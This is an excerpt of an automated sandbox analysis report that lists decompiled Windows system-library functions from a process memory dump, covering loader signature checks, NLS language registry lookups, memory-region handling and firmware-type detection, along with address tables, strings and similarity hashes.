								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E019D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E019D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01A37016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E019EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E019BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                  0x019c7e4c
                                  0x019c7e50
                                  0x019c7e55
                                  0x019c7e58
                                  0x019c7e5d
                                  0x019c7e71
                                  0x019c7f33
                                  0x019c7e77
                                  0x019c7e77
                                  0x019c7e79
                                  0x019c7e79
                                  0x019c7e7e
                                  0x019c7f45
                                  0x01a19848
                                  0x00000000
                                  0x01a19848
                                  0x019c7f4e
                                  0x019c7f53
                                  0x019c7f5a
                                  0x00000000
                                  0x00000000
                                  0x01a1985a
                                  0x01a19862
                                  0x01a19866
                                  0x00000000
                                  0x01a1986c
                                  0x00000000
                                  0x01a1986c
                                  0x019c7e84
                                  0x019c7e84
                                  0x019c7e8d
                                  0x01a19871
                                  0x019c7eb8
                                  0x019c7ec0
                                  0x019c7ec0
                                  0x019c7e9a
                                  0x01a1987e
                                  0x00000000
                                  0x00000000
                                  0x01a19884
                                  0x01a1988b
                                  0x01a198a7
                                  0x01a198ac
                                  0x01a198b1
                                  0x01a198b6
                                  0x01a198b8
                                  0x01a198b8
                                  0x01a198b9
                                  0x00000000
                                  0x01a198b9
                                  0x019c7ea0
                                  0x019c7ea7
                                  0x00000000
                                  0x00000000
                                  0x019c7eac
                                  0x019c7eb1
                                  0x019c7ec6
                                  0x019c7ed0
                                  0x01a198cc
                                  0x019c7ed6
                                  0x019c7ed6
                                  0x019c7ed6
                                  0x019c7ede
                                  0x019c7ee3
                                  0x01a198e3
                                  0x01a198f0
                                  0x01a19902
                                  0x01a198f2
                                  0x01a198fb
                                  0x01a198fb
                                  0x01a19907
                                  0x01a1991d
                                  0x01a1991d
                                  0x01a19907
                                  0x01a198e3
                                  0x019c7ef0
                                  0x019c7f14
                                  0x019c7f14
                                  0x019c7f1e
                                  0x01a19946
                                  0x019c7f24
                                  0x019c7f24
                                  0x019c7f24
                                  0x019c7f2c
                                  0x01a1996a
                                  0x01a19975
                                  0x01a19975
                                  0x01a1997e
                                  0x01a19993
                                  0x01a19993
                                  0x01a1997e
                                  0x00000000
                                  0x019c7ef2
                                  0x019c7efc
                                  0x019c7f0a
                                  0x019c7f0e
                                  0x01a19933
                                  0x00000000
                                  0x01a19933
                                  0x00000000
                                  0x019c7f0e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x019c7eb1

                                  Strings
                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 01A19891
                                  • LdrpCompleteMapModule, xrefs: 01A19898
                                  • minkernel\ntdll\ldrmap.c, xrefs: 01A198A2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                  • API String ID: 0-1676968949
                                  • Opcode ID: c55163f16e6c30976061539f89aa9b97a7afc36060b29c823b0f9c620f7104e6
                                  • Instruction ID: b396bf1b6c607efd82006c76fc0b7d2c81fc1850ea3b5b9c54d71007264c4782
                                  • Opcode Fuzzy Hash: c55163f16e6c30976061539f89aa9b97a7afc36060b29c823b0f9c620f7104e6
                                  • Instruction Fuzzy Hash: 3651F432600746DBEB2ACBADC994B2A7BE4BB41B14F040559E9999B7E1D730FD00CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 019BE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E019BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E019BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E019F95D0();
						}
						if(_t78 != 0) {
							L019D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E019FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E019FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E019F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E019FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L019BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E019FBB40(_t83, _t102 + 0x24, _t78);
								if(L019C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E019FBB40(_t84, _t102 + 0x24, _t94);
									if(L019C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                  0x019be620
                                  0x019be628
                                  0x019be62f
                                  0x019be631
                                  0x019be635
                                  0x019be637
                                  0x019be63e
                                  0x01a15503
                                  0x01a15503
                                  0x019be64c
                                  0x019be64c
                                  0x019be651
                                  0x00000000
                                  0x00000000
                                  0x019be661
                                  0x019be665
                                  0x01a1542a
                                  0x019be715
                                  0x019be71a
                                  0x019be71c
                                  0x019be720
                                  0x019be720
                                  0x019be727
                                  0x019be736
                                  0x019be736
                                  0x019be743
                                  0x019be743
                                  0x019be673
                                  0x019be678
                                  0x019be67d
                                  0x019be682
                                  0x019be685
                                  0x019be692
                                  0x019be69b
                                  0x019be6a3
                                  0x019be6ad
                                  0x019be6b1
                                  0x019be6b2
                                  0x019be6bb
                                  0x019be6bf
                                  0x019be6c0
                                  0x019be6c8
                                  0x019be6cc
                                  0x019be6d5
                                  0x019be6d9
                                  0x00000000
                                  0x00000000
                                  0x019be6e5
                                  0x019be6ea
                                  0x019be6f9
                                  0x019be70b
                                  0x019be70f
                                  0x01a15439
                                  0x01a1545e
                                  0x01a1545e
                                  0x00000000
                                  0x01a1545e
                                  0x01a1543b
                                  0x01a1543e
                                  0x01a15440
                                  0x01a15445
                                  0x01a15472
                                  0x01a15475
                                  0x01a1548d
                                  0x01a15493
                                  0x01a154a9
                                  0x00000000
                                  0x00000000
                                  0x01a154ab
                                  0x01a154b4
                                  0x01a154bc
                                  0x01a154c8
                                  0x01a154de
                                  0x01a154fb
                                  0x01a154e0
                                  0x01a154e6
                                  0x01a154eb
                                  0x01a154eb
                                  0x01a154de
                                  0x00000000
                                  0x01a154bc
                                  0x01a15477
                                  0x01a1547a
                                  0x01a15480
                                  0x01a15483
                                  0x01a15486
                                  0x01a1548b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a1548b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a15447
                                  0x01a15447
                                  0x01a15447
                                  0x01a15447
                                  0x01a1544e
                                  0x00000000
                                  0x00000000
                                  0x01a15450
                                  0x01a15452
                                  0x01a15455
                                  0x01a1545a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01a1545c
                                  0x01a1546a
                                  0x01a1546d
                                  0x01a1546f
                                  0x00000000
                                  0x01a1546f
                                  0x019be70f

                                  Strings
                                  • InstallLanguageFallback, xrefs: 019BE6DB
                                  • @, xrefs: 019BE6C0
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 019BE68C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  • API String ID: 0-1757540487
                                  • Opcode ID: fe3486bad6e82dc4b15f3a0e5488187f2c89866ad8ce91fcc22ccdc2945470e0
                                  • Instruction ID: 228ec6917af20ac819e36811fb7f148ce1fe013982f9dec733251103c1709282
                                  • Opcode Fuzzy Hash: fe3486bad6e82dc4b15f3a0e5488187f2c89866ad8ce91fcc22ccdc2945470e0
                                  • Instruction Fuzzy Hash: DD51D476A083069BD714DF68C480AABB7E9BFC9715F05092EFA89D7241F734D904C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A7E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 60%
                                  			E01A7E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E01A7BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E01A7BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E01A7AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E019F9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E01A7A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E01A7A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E019F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E01A7A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E01A7A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E019D2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E019CB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E019CFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E019D7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E01A6FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                  0x01a7e547
                                  0x01a7e549
                                  0x01a7e54f
                                  0x01a7e553
                                  0x01a7e557
                                  0x01a7e55a
                                  0x01a7e55c
                                  0x01a7e55f
                                  0x01a7e561
                                  0x01a7e567
                                  0x01a7e56b
                                  0x01a7e7e2
                                  0x00000000
                                  0x01a7e571
                                  0x01a7e575
                                  0x01a7e577
                                  0x01a7e57b
                                  0x01a7e57c
                                  0x01a7e57d
                                  0x01a7e57e
                                  0x01a7e57f
                                  0x01a7e588
                                  0x01a7e58f
                                  0x01a7e591
                                  0x01a7e592
                                  0x01a7e592
                                  0x01a7e596
                                  0x01a7e59e
                                  0x01a7e5a0
                                  0x01a7e5a6
                                  0x01a7e61d
                                  0x01a7e61d
                                  0x01a7e621
                                  0x01a7e623
                                  0x01a7e630
                                  0x01a7e630
                                  0x01a7e7e6
                                  0x01a7e7eb
                                  0x01a7e7ed
                                  0x01a7e7f4
                                  0x01a7e7fa
                                  0x01a7e7ff
                                  0x01a7e7ff
                                  0x01a7e80a
                                  0x01a7e812
                                  0x01a7e812
                                  0x01a7e5ab
                                  0x01a7e5b4
                                  0x01a7e5b9
                                  0x01a7e5be
                                  0x01a7e5c0
                                  0x01a7e5c2
                                  0x01a7e5c8
                                  0x01a7e5c9
                                  0x01a7e5cb
                                  0x01a7e5cc
                                  0x01a7e5d5
                                  0x01a7e5e4
                                  0x01a7e5f1
                                  0x01a7e5f8
                                  0x01a7e5f8
                                  0x01a7e5d5
                                  0x01a7e602
                                  0x01a7e616
                                  0x01a7e63d
                                  0x01a7e644
                                  0x01a7e64d
                                  0x01a7e652
                                  0x01a7e657
                                  0x01a7e659
                                  0x01a7e65b
                                  0x01a7e661
                                  0x01a7e662
                                  0x01a7e664
                                  0x01a7e665
                                  0x01a7e66e
                                  0x01a7e67d
                                  0x01a7e68a
                                  0x01a7e691
                                  0x01a7e691
                                  0x01a7e66e
                                  0x01a7e6b0
                                  0x00000000
                                  0x01a7e6b6
                                  0x01a7e6bd
                                  0x01a7e6c7
                                  0x01a7e6d7
                                  0x01a7e6d9
                                  0x01a7e6db
                                  0x01a7e6de
                                  0x01a7e6e3
                                  0x01a7e6f3
                                  0x01a7e6fc
                                  0x01a7e700
                                  0x01a7e700
                                  0x01a7e704
                                  0x01a7e70a
                                  0x01a7e70a
                                  0x01a7e713
                                  0x01a7e716
                                  0x01a7e719
                                  0x01a7e720
                                  0x01a7e761
                                  0x01a7e76b
                                  0x01a7e774
                                  0x01a7e77a
                                  0x01a7e77a
                                  0x01a7e78a
                                  0x01a7e791
                                  0x01a7e799
                                  0x01a7e79b
                                  0x01a7e79f
                                  0x01a7e7aa
                                  0x01a7e7c0
                                  0x01a7e7ac
                                  0x01a7e7b2
                                  0x01a7e7b9
                                  0x01a7e7b9
                                  0x01a7e7c7
                                  0x01a7e806
                                  0x00000000
                                  0x01a7e7c9
                                  0x01a7e7d1
                                  0x01a7e7d8
                                  0x00000000
                                  0x01a7e7d8
                                  0x00000000
                                  0x00000000
                                  0x01a7e722
                                  0x01a7e72e
                                  0x01a7e748
                                  0x01a7e74c
                                  0x01a7e754
                                  0x01a7e756
                                  0x01a7e75c
                                  0x01a7e75c
                                  0x00000000
                                  0x01a7e75c
                                  0x01a7e758
                                  0x01a7e758
                                  0x00000000
                                  0x01a7e758
                                  0x01a7e750
                                  0x00000000
                                  0x00000000
                                  0x01a7e752
                                  0x00000000
                                  0x01a7e752
                                  0x01a7e730
                                  0x01a7e735
                                  0x01a7e73d
                                  0x01a7e73f
                                  0x00000000
                                  0x00000000
                                  0x01a7e741
                                  0x01a7e741
                                  0x00000000
                                  0x01a7e741
                                  0x01a7e739
                                  0x00000000
                                  0x00000000
                                  0x01a7e73b
                                  0x00000000
                                  0x01a7e73b
                                  0x01a7e722
                                  0x01a7e720
                                  0x01a7e6b0
                                  0x01a7e618
                                  0x00000000
                                  0x01a7e618

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  • API String ID: 0-197956300
                                  • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction ID: d00e2bcd7c39f242fcbcb06c7ed1f3351b4a9dc4ed649d6370fe2f0f22d73d88
                                  • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                  • Instruction Fuzzy Hash: 6A918F716043429FE725CF29CD41B1BBBE6AF84714F18896DF699CB280E774EA04CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01A351BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 77%
                                  			E01A351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x1a905f0);
				E01A0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E019CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E01A353CA(0);
						return E01A0D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E019FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E019D3690(1, _t117, 0x1991810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E019FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L019D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E019FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E01A3500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E019F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                  0x01a351be
                                  0x01a351c3
                                  0x01a351c8
                                  0x01a351cd
                                  0x01a351d0
                                  0x01a351d3
                                  0x01a351d8
                                  0x01a351db
                                  0x01a351de
                                  0x01a351e0
                                  0x01a351e3
                                  0x01a351e6
                                  0x01a351e8
                                  0x01a35342
                                  0x01a35351
                                  0x01a35356
                                  0x01a3535a
                                  0x01a35360
                                  0x01a35363
                                  0x01a35366
                                  0x01a35369
                                  0x01a35369
                                  0x01a3536b
                                  0x01a3536b
                                  0x01a35370
                                  0x01a353a3
                                  0x01a353a4
                                  0x01a353a6
                                  0x01a353ab
                                  0x01a353ab
                                  0x01a353ae
                                  0x01a353ae
                                  0x01a353b5
                                  0x01a353bf
                                  0x01a353bf
                                  0x01a35375
                                  0x01a35396
                                  0x01a353a0
                                  0x01a353a0
                                  0x00000000
                                  0x01a35396
                                  0x01a35377
                                  0x01a35379
                                  0x01a3537f
                                  0x01a3538c
                                  0x01a35390
                                  0x00000000
                                  0x01a35390
                                  0x01a351ee
                                  0x01a351f1
                                  0x01a35301
                                  0x01a35310
                                  0x01a35315
                                  0x01a35318
                                  0x01a3531b
                                  0x01a35320
                                  0x01a3532e
                                  0x01a35331
                                  0x00000000
                                  0x01a35331
                                  0x01a35328
                                  0x01a35329
                                  0x00000000
                                  0x01a35329
                                  0x01a351fa
                                  0x01a35235
                                  0x01a35236
                                  0x01a35239
                                  0x01a3523f
                                  0x01a35240
                                  0x01a35241
                                  0x01a35242
                                  0x01a35246
                                  0x01a35247
                                  0x01a3524e
                                  0x01a35251
                                  0x01a35267
                                  0x01a35269
                                  0x01a3526e
                                  0x01a3527d
                                  0x01a3527e
                                  0x01a35281
                                  0x01a35282
                                  0x01a35287
                                  0x01a35288
                                  0x01a3528a
                                  0x01a3528f
                                  0x01a35294
                                  0x00000000
                                  0x00000000
                                  0x01a3529a
                                  0x01a3529c
                                  0x01a3529e
                                  0x01a3529e
                                  0x01a352a4
                                  0x01a352b0
                                  0x00000000
                                  0x00000000
                                  0x01a352ba
                                  0x01a352bc
                                  0x01a352bc
                                  0x01a352d4
                                  0x01a352d9
                                  0x01a352dc
                                  0x01a352e1
                                  0x00000000
                                  0x00000000
                                  0x01a352e7
                                  0x01a352f4
                                  0x00000000
                                  0x01a352f4
                                  0x01a35270
                                  0x00000000
                                  0x01a35270
                                  0x01a351fc
                                  0x01a351fd
                                  0x01a35202
                                  0x01a35203
                                  0x01a35205
                                  0x01a3520a
                                  0x01a3520f
                                  0x00000000
                                  0x00000000
                                  0x01a3521b
                                  0x01a35226
                                  0x01a3522b
                                  0x01a3521d
                                  0x01a3521d
                                  0x01a35222
                                  0x01a35222
                                  0x01a3522d
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  • API String ID: 2994545307-634100481
                                  • Opcode ID: ce56392d25765921f1f5742541249b3159caf8fd70d10e3a307aa7f3209797b6
                                  • Instruction ID: f0d03f79e90cb20a03ed9319af9f54a2814dd7a11e443f8bcaf35e7f79b2db1c
                                  • Opcode Fuzzy Hash: ce56392d25765921f1f5742541249b3159caf8fd70d10e3a307aa7f3209797b6
                                  • Instruction Fuzzy Hash: 545128B1E006099FDB25DFADC990BAEBBF9BB88700F14402DF649EB251D671D940CB50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

